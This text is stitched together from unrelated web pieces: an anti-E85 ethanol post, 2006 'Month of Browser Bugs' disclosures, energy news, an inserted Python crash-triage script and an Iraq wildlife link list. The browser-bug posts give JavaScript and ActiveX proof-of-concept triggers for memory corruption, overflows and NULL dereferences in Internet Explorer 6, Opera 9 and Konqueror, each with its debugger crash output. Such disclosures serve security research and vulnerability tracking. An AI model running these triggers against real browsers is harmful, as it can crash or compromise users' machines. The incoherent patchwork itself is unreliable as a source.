As GM admits, the consumer can choose “to operate on gasoline or on a blend of 85% ethanol and 15% gasoline. So, you can choose the fuel that's best for you. That's good to know, because E85 fuel is not yet widely available.” In other words, in the vast majority of cases your new flex fuel vehicle will still be running on regular gas. Charter members of the National Ethanol Vehicle Coalition (NEVC), which promotes E85 fuel, included GM, DaimlerChrysler, and Ford when it was set up in June 2000.

Meanwhile, E85 fuel is also being promoted by organisations such as the National Corn Growers Association, as well as regional and state corn growers organisations, associated agribusinesses and biofuel companies, all of which have a commercial interest in promoting E85 fuel. According to the Center for Responsive Politics, a clearinghouse on political donations, the agribusiness sector has funneled more than $190 million into federal election campaigns since the 2000 election cycle. The NEVC’s bylaws describe its purpose as to "ensure that as decisions regarding the future of America’s use of alternative forms of transportation fuels are being made, ethanol has a role in the nation’s alternative transportation fuel market and support the expanded use of ethanol" and to "advance legislative proposals" to this effect. This seems to be regardless of whether ethanol/E85 fuel is the best or is even a good solution to our energy challenges.

As the Engineer Poet points out in this post, burning fuel for transportation is a very inefficient way of using energy. Whether you are fed up with the current use of petroleum for transportation for environmental, political or financial reasons, E85 fuel is simply not the answer. What we need is a step change, as represented by moving from using gas burning vehicles to electric vehicles.

To encourage this, I urge you to sign this online plug in hybrid campaign asking automakers to produce plug-in hybrid electric vehicles (PHEVs).

Autoblog Green's exclusive interview with Tesla Motors' chairman

Tesla Roadster Video

Archer Daniels Midland (ADM) - the Largest U.S. Ethanol Producer

Vinod Khosla Debunked

Car and Driver Magazine on the Promise of Energy Independence through Ethanol

USA Today on the Ethanol Debate

Cutting Down Borneo's Rainforests to Make BioFuels

MoBB #26: Opera CSS Background

The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.

var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';

Demonstration

eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000

This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption

Tuesday, July 25, 2006

MoBB #25: Native Function Iterator

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. A NULL reference can be triggered by using javascript to iterate over a native function.

for (var i in window.alert) { var a = 1; }

Demonstration

eax=00000000 ebx=ffffffff ecx=0013b3f0
edx=0013b3f0 esi=00000000 edi=0013b488
eip=7dceef12 esp=0013b3d0 ebp=0013b3d4
mshtml!CPtrBagVTableAggregate::CIterator::Start+0x1e:
7dceef12 ff36 push dword ptr [esi] ds:0023:00000000=?????

This bug will be added to the OSVDB:
Microsoft IE Native Function Iteration NULL Dereference

Sunday, July 23, 2006

MoBB #24: Forms.ListBox.1 ListWidth

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system with the latest version of Office 2003 installed. Setting the ListWidth property of either the Forms.ListBox.1 or Forms.ComboBox.1 objects to 0x7fffffff will result in an integer overflow exception, while setting it to 0x7ffffffe will trigger a NULL dereference.

var a = new ActiveXObject('Forms.ListBox.1');
a.ListWidth = 0x7ffffffe;

Demonstration

eax=00000000 ebx=0013b0d8 ecx=00000001
edx=00000052 esi=0013b084 edi=600b115e
eip=60009115 esp=0013b044 ebp=0013b044
FM20!DllGetClassObject+0x6bd5:
60009115 0fb710 movzx edx,word ptr [eax] ds:0023:00000000=????

This bug will be added to the OSVDB:
Microsoft IE Forms Multiple Object ListWidth Property Integer Overflow

MoBB #23: NMSA.ASFSourceMediaDescription dispValue

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows 2000 SP4 system. Setting the dispValue property of this object to a long string triggers a stack overflow (not a buffer overflow).

var a = new ActiveXObject('NMSA.ASFSourceMediaDescription.1');
var b = 'XXXX';
while (b.length <= 1024) b += b;
a.dispValue = b;

Demonstration

eax=027221f8 ebx=00000000 ecx=0019d198
edx=00160dae esi=027221f8 edi=00000000
eip=77a22395 esp=00032f78 ebp=00033180
OLEAUT32!CTypeInfo2::VariantVtOfHtype+0x9:
77a22395 56 push esi

This bug will be added to the OSVDB:
Microsoft IE NMSA.ASFSourceMediaDescription dispValue Stack Overflow

Friday, July 21, 2006

MoBB #22: Internet.HHCtrl Click

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the Click() method on this object, without first initializing the URL, will trigger a NULL dereference. This bug was submitted by Alex F.

var a = new ActiveXObject("Internet.HHCtrl.1");
a.Click();

Demonstration

eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE HTML Help COM Object Click Method NULL Dereference

Thursday, July 20, 2006

MoBB #21: CEnroll stringToBinary

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the stringToBinary() function with a long string for the second parameter can result in an invalid memory access inside the SysAllocStringLen function. This bug is similar to MoBB #8.

var a = new ActiveXObject('CEnroll.CEnroll.2');
var b = 'BOOM';
while (b.length <= 1024*1024) b+=b;
a.stringToBinary(1, b);

Demonstration

eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000

This bug will be added to the OSVDB:
Microsoft IE CEnroll SysAllocStringLen Invalid Length

Wednesday, July 19, 2006

MoBB #20: OVCtl NewDefaultItem

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Outlook to be installed. Calling the NewDefaultItem() method triggers a NULL dereference. This bug was submitted by Alfredo Melloni.

var a = new ActiveXObject('OVCtl.OVCtl.1');
a.NewDefaultItem();

Demonstration

eax=00000000 ebx=00000800 ecx=0013b234
edx=0013b200 esi=00000000 edi=357a3b58
eip=357b07e3 esp=0013b1c4 ebp=0013b240
OUTLCTL!DllUnregisterServer+0x3678:
357b07e3 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE OVCtl NewDefaultItem Method NULL Dereference

MoBB #19: DataSourceControl getDataMemberName

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system and requires Office 2003 to be installed (older versions of this control have not been tested). Calling the getDataMemberName() method with a negative large integer value results in an integer overflow and a NULL dereference.

var a = new ActiveXObject('OWC11.DataSourceControl.11');
a.getDataMemberName(-0x80000000);

Demonstration

eax=0000001c ebx=025d15a8 ecx=0000001c
edx=387d0e24 esi=0013b234 edi=0013b204
eip=3878cfac esp=0013b1fc ebp=0013b228
OWC11!DllGetClassObject+0x5a3e4:
3878cfac 8b01 mov eax,[ecx] ds:0023:0000001c=????????

This bug will be added to the OSVDB:
Microsoft IE OWC11.DataSourceControl getDataMemberName Method Integer Overflow

Tuesday, July 18, 2006

MoBB #18: WebViewFolderIcon setSlice

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Calling the setSlice() method with the first argument set to 0x7fffffff triggers an invalid memory copy.

var a = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
a.setSlice(0x7fffffff, 0, 0x41424344, 0);

Demonstration

eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????

This bug will be added to the OSVDB:
Microsoft IE WebViewFolderIcon setSlice Integer Overflow

Monday, July 17, 2006

Why Alternative Energy?



A poll carried out for the BBC World Service of nearly 20,000 people from across 19 countries found wide support for alternative energy strategies.

The poll illustrates a perceived triple threat from the way the world produces and uses energy.

Majorities across all 19 countries indicate that citizens fear:

the climate and environment are being harmed
that the global economy will be destabilised
that competition for energy will lead to greater conflict

Some eight out of 10 of those questioned were worried about the threat to the environment. In Australia, Great Britain, Canada and Italy the level of concern topped 90%.

Doug Miller, president of the poll firm GlobeScan, said: "What's fascinating is that in the midst of historically high energy prices and geopolitical tensions, the number one energy concern in every industrialised country we surveyed is the environmental and climate impacts."

Creating tax incentives to encourage the use of alternative energy sources such as wind and solar power found favour with 80% of respondents.

But there was lukewarm support for more nuclear energy to reduce reliance on fossil fuels. On average, 49% were in favour of building more nuclear plants.

Majorities of 60% or more in 18 of the 19 countries polled said they feared energy shortages and prices would destabilise the world economy.

The least concerned was Russia, a major oil and gas producer, which benefits from higher prices.

Both US and EU leaders have warned Russia not to use energy as a tool of foreign policy. Earlier this year, the nation's monopoly, Gazprom, cut off gas supplies to Europe during a price dispute with Ukraine.

Some 73% of those questioned were worried that energy shortages would lead to greater conflict among nations.

In total, 19,579 citizens were interviewed in Australia, Brazil, Canada, Chile, Egypt, France, Germany, Great Britain, India, Israel, Italy, Kenya, Mexico, Philippines, Poland, Russia, South Korea, Ukraine and the US.

Polling was conducted for the BBC World Service by polling firm GlobeScan and its research partners.

Full Article on BBC News

$4b Investment in Wind Power by BP Alternative Energy



BP is making its first major investment in wind power with a joint venture that will lead to a major expansion of its generating capacity.

The oil company announced it had entered a five-year supply and development agreement involving five wind power projects in the US with Clipper Windpower.

The news sent Clipper shares up 80p, or 28 per cent, to 362.5p in London. The projects, with an anticipated total generating capacity of 2,015 megawatts, are situated in New York, Texas and South Dakota.

BP has also secured a mix of firm and contingent orders of up to 2,250 megawatts of additional Clipper wind turbines in its global wind energy portfolio, the companies said.

BP launched BP Alternative Energy to focus on solar, hydrogen and wind power but its wind operation has up to now been confined to two projects with a combined output of only 31 megawatts.

Steve Westwell, the chief executive of BP Alternative Energy, said: "We believe the Clipper turbine is a breakthrough in reducing the total cost of renewable energy and we are pleased to be the first large customers for this innovative technology."

This is thought to be the biggest single investment in wind power, estimated at $4 billion US dollars.

The announcement came in the same week that the British government published its energy review and a telephone poll found that 79% of respondents thought solar power and 76% wind power were the best investments in electricity generation for the UK.

Sunday, July 16, 2006

MoBB #17: Gradient StartColorStr

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the StartColorStr or EndColorStr properties to a large value leads to a stack overflow exception (not a buffer overflow).

var a = new ActiveXObject('DXImageTransform.Microsoft.Gradient.1');
var b = 'XXXX';
while (b.length <= (1024*1024)) b += b;
a.StartColorStr = b;

Demonstration

eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Stack Overflow

MoBB #16: MHTMLFile Location

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the location or URL property triggers a NULL dereference. Thanks to 'sniper' for the submission.

var a = new ActiveXObject('mhtmlfile');
a.location = "http://browserfun.blogspot.com";

Demonstration

eax=00000000 ebx=00000001 ecx=0000ae80
edx=0020540c esi=019c2420 edi=00000000
eip=7dcd113e esp=00139048 ebp=0013b074
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE MHTMLFile Multiple Property NULL Dereference

Friday, July 14, 2006

MoBB #15: FolderItem Access

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Accessing the object reference of this control triggers a NULL dereference in the security check :-)

<object id="target" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88">
</object>

var a = document.getElementById('target');
alert(a.object);

Demonstration

eax=0000eb6c ebx=00000000 ecx=00000000
edx=09105b62 esi=0013b1ac edi=03cec120
eip=7cb86ce4 esp=0013aee4 ebp=0013b184
SHELL32!CFolder::_SecurityCheck:
7cb86ce4 83790c00 cmp dword ptr [ecx+0xc],0x0 ds:0023:0000000c=????????

This bug will be added to the OSVDB:
Microsoft IE FolderItem Object NULL Dereference

MoBB #14: Konqueror replaceChild()

The following bug was tested on KDE 3.5.1 on a current Gentoo Linux system. Calling the replaceChild() method on almost any DOM element can result in a NULL dereference.

document.replaceChild(0);

Demonstration

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1231504512 (LWP 11418)]
0xb6552ca0 in DOM::Node::replaceChild () from /usr/kde/3.5/lib/libkhtml.so.4
(gdb) display /i $pc
1: x/i $pc 0xb6552ca0 <_ZN3DOM4Node12replaceChildERKS0_S2_+110>: testb $0x8,0x22(%edx)
(gdb) i r $edx
edx 0x0 0

This bug will be added to the OSVDB:
KDE Konqueror replaceChild() NULL Dereference

Wednesday, July 12, 2006

MoBB #13: RevealTrans Transition

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the Transition property of this object triggers a NULL dereference.

var a = new ActiveXObject('DXImageTransform.Microsoft.RevealTrans.1');
a.Transition = 1;

Demonstration

eax=00000000 ebx=00000000 ecx=35cde0c4
edx=00174972 esi=02d701d8 edi=00000001
eip=35cde0fe esp=0012b240 ebp=0012b25c
dxtmsft!CDXTRevealTrans::put_Transition+0x3a:
35cde0fe 8b08 mov ecx,[eax] ds:0023:00000000=????????

This bug will be added to the OSVDB:
Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference

Tuesday, July 11, 2006

MoBB #12: TriEditDocument URL

The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. Setting the URL property of this object triggers a NULL dereference.

var a = new ActiveXObject('TriEditDocument.TriEditDocument');
a.URL = "Boom!";

Demonstration

eax=00000000 ebx=00000001 ecx=000076b6
edx=018f486c esi=018f3c10 edi=00000000
eip=7dcd113e esp=00137034 ebp=00139060
mshtml!COmWindowProxy::CanNavigateToUrlWithZoneCheck+0x9b:
7dcd113e 80783e00 cmp byte ptr [eax+0x3e],0x0 ds:0023:0000003e=??

This bug will be added to the OSVDB:
Microsoft IE TriEditDocument URL Property NULL Dereference
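
As an added example (not code from the original posts), the sketch below parses the WinDbg-style register dumps shown in the posts above and sorts each crash into the bucket a defender triaging a crash report would care about: NULL-page dereference, invalid read, invalid write, or stack exhaustion. The dumps are copied from MoBB #22, #18, #21 and #17; the 64 KB NULL-page threshold, the bucket names and the function names are assumptions made for this illustration.

```python
import re

# Register dumps copied verbatim from the MoBB #22, #18, #21 and #17 posts.
DUMPS = {
    "MoBB #22": """eax=00000000 ebx=00000000 ecx=00000000
edx=00000000 esi=0237bb68 edi=00000000
eip=7db374c0 esp=0013a3d0 ebp=0013a3f0
hhctrl!CHtmlHelpControl::GetCurrentUrl+0x3c:
7db374c0 8b08 mov ecx,[eax] ds:0023:00000000=????????""",
    "MoBB #18": """eax=00000010 ebx=001e4940 ecx=00000004
edx=7c97c0d8 esi=0013b188 edi=fffffff0
eip=773e0ba3 esp=0013b14c ebp=0013b158
comctl32!DSA_SetItem+0x60:
773e0ba3 f3a5 rep movsd ds:0013b188=41424344 es:fffffff0=????????""",
    "MoBB #21": """eax=03580024 ebx=00300000 ecx=0005fc08
edx=00300000 esi=03571000 edi=03701004
eip=77124ba4 esp=0013b200 ebp=0013b20c
OLEAUT32!SysAllocStringLen+0x4f:
77124ba4 f3a5 rep movsd ds:03571000=???????? es:03701004=00000000""",
    "MoBB #17": """eax=00007004 ebx=00100001 ecx=0004215c
edx=0013b1ac esi=03b00024 edi=00000000
eip=6be11a16 esp=0013b154 ebp=0013b190
dxtmsft!_chkstk+0x25:
6be11a16 8501 test [ecx],eax ds:0023:0004215c=00000000""",
}

REG = re.compile(r"\b(e[a-z]{2})=([0-9a-f]{8})\b")
INSN = re.compile(r"^([0-9a-f]{8})\s+([0-9a-f]+)\s+(.*)$")
# Memory operand annotation: seg:[selector:]address=value; '?' means unreadable.
MEMREF = re.compile(
    r"\b(cs|ds|es|fs|gs|ss):(?:[0-9a-f]{4}:)?([0-9a-f]{8})=([0-9a-f?]+)")

NULL_PAGE_LIMIT = 0x10000            # assumption: low 64 KB counts as the NULL page
READ_ONLY = {"cmp", "test", "push"}  # a memory first operand here is only read


def parse_dump(text):
    """Split one dump into registers, faulting symbol, instruction, memory refs."""
    crash = {"regs": {}, "symbol": None, "insn": None, "refs": []}
    for line in (raw.strip() for raw in text.splitlines()):
        m = INSN.match(line)
        if m:
            crash["insn"] = MEMREF.sub("", m.group(3)).strip()
            # Each ref is (segment, address, value_was_readable).
            crash["refs"] = [(seg, int(addr, 16), set(val) != {"?"})
                             for seg, addr, val in MEMREF.findall(m.group(3))]
        elif line.endswith(":") and "!" in line:
            crash["symbol"] = line[:-1]
        else:
            crash["regs"].update((r, int(v, 16)) for r, v in REG.findall(line))
    return crash


def classify(crash):
    """Heuristic triage bucket for a parsed crash (not an exploitability verdict)."""
    if not crash["insn"]:
        return "unclassified"
    words = crash["insn"].split()
    if words[0] in ("rep", "repe", "repne"):
        words = words[1:]
    mnem, dest = words[0], " ".join(words[1:]).split(",")[0]
    for seg, addr, readable in crash["refs"]:
        if readable:
            continue
        if addr < NULL_PAGE_LIMIT:
            return "null-dereference"
        # String copies write through es:edi; otherwise a bracketed first
        # operand of a non-comparing instruction is the write target.
        string_store = mnem.startswith(("movs", "stos")) and seg == "es"
        mem_dest = "[" in dest and mnem not in READ_ONLY
        return "invalid-write" if string_store or mem_dest else "invalid-read"
    # Heuristic: a fault in the stack probe, or on a push with no memory
    # operand, points at an exhausted stack rather than a bad pointer.
    if "_chkstk" in (crash["symbol"] or "") or (mnem == "push" and not crash["refs"]):
        return "stack-exhaustion"
    return "unclassified"


def triage_all(dumps=DUMPS):
    return {name: classify(parse_dump(text)) for name, text in dumps.items()}


if __name__ == "__main__":
    for name, verdict in triage_all().items():
        print(f"{name}: {verdict}")
```

The gdb output in the Konqueror post uses a different layout and is outside what this parser handles.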

Iraq Natural History References and Iraq Fauna Wiki

I wish I knew what was happening at my other site Iraqfauna.wikispaces.com. The unique visitors are going through the roof! My hope is that it will be used primarily by Iraqis to share information on the country's animal biodiversity. So far I've been the only editor, so it's not living up to its potential as a collaborative site. I have been working on the Iraq bird list and slowly adding Arabic names and links to both species photos and range maps, where available.

I've also added more links for people to explore. I'll copy them here to give them a wider audience. Remember anyone can edit the Iraqfauna wiki and add to it. All previous versions are saved so don't worry about wrecking anything.
------------------------------------------------------------------------------------------------
Iraq Natural History Links from iraqfauna.wikispaces.com
INVERTEBRATES
Longhorn Beetles (Cerambycidae) of the Western Palearctic - Michal Hoskovek and Martin Rejzek of the Czech Republic have compiled an illustrated list of the hundreds of species of this large and economically important group of beetles. Their site also has field trip reports from Iran, Syria and Turkey. A very impressive site.

The Sphingidae of the Western Palearctic - Tony Pittaway's comprehensive site covering all the Hawkmoths of the region. Detailed species pages have photos of adults, caterpillars and sometimes parasitoids. An excellent resource.

Scorpions of Iraq - A pictorial introduction to the species of scorpions in Iraq by Norwegian scorpion researcher Jan Ove Rein.

FISH
FISHBASE - List of Fish of Iraq This incredible resource has over 1000 collaborators and has a huge amount of info on Iraqi Fish derived from their database. Info includes pictures, bibliography, collection data.

Freshwater Fishes of Iraq - A project of Brian W. Coad, a scientist at the Canadian Museum of Nature in Ottawa. In addition to a great picture of a large Tigris Salmon (Barbus esocinus), this site has the most authoritative species list, a list of Arabic fish names and a huge bibliography of over 1500 entries.

BIRDS
Laura Erikson's Birderblog - Iraq Species Gallery - A selection of bird photos taken in Iraq by US military and civilians sent to Laura Erikson who runs Birderblog.

Birding Babylon - Natural history notes from Iraq. Started in March 2004 when Jonathan Trouern-Trend deployed to Iraq with the US Army.

Birdlife International's Important Bird Areas in Iraq - Link to descriptions and map pages of areas identified as IBAs in Iraq.

Birds of the Western Palearctic - Maps for all the birds on the Western Palearctic list. Iraq is on the far eastern border of the region.

Birds of Kuwait - Part of Abdul-Rahman Al-Sirhan's fantastic site on the wildlife of Kuwait. He has spent the last few years photographing and documenting the fauna of Kuwait and has a large number of great photos. Most bird species found in Kuwait can also be found in parts of Iraq. Google's Arabic-English translation tool can be used to read the Arabic parts of the website.

Environmental Organizations working in Iraq
Birdlife International

Canada-Iraq Marshlands Initiative

Eden Again/Iraq Nature

Iraq Nature Conservation Association

UN Environmental Program - Marshlands Project

Iraqi Marshlands Observation System - a collaborative project that uses satellite imagery and landcover analysis to document the restoration of the Mesopotamian Marshes in Southern Iraq. Includes weekly imagery. April 2006 - Marsh Vegetation at 58% of pre-drainage levels - In March 2003 the marshes were down to approximately 7% of historic levels.

Academic and Governmental Organizations
Ministry of Environment - English language website for the Iraqi Ministry of Environment in Baghdad.

University of Basrah Marine Science Center - An institution devoted to the study of the biology and environment of the southern Iraqi Marshes, the Shatt Al-Arab and the Arabian Gulf. Publishes a newsletter and the journals Marina Mesopotamica and the Journal of Aquaculture.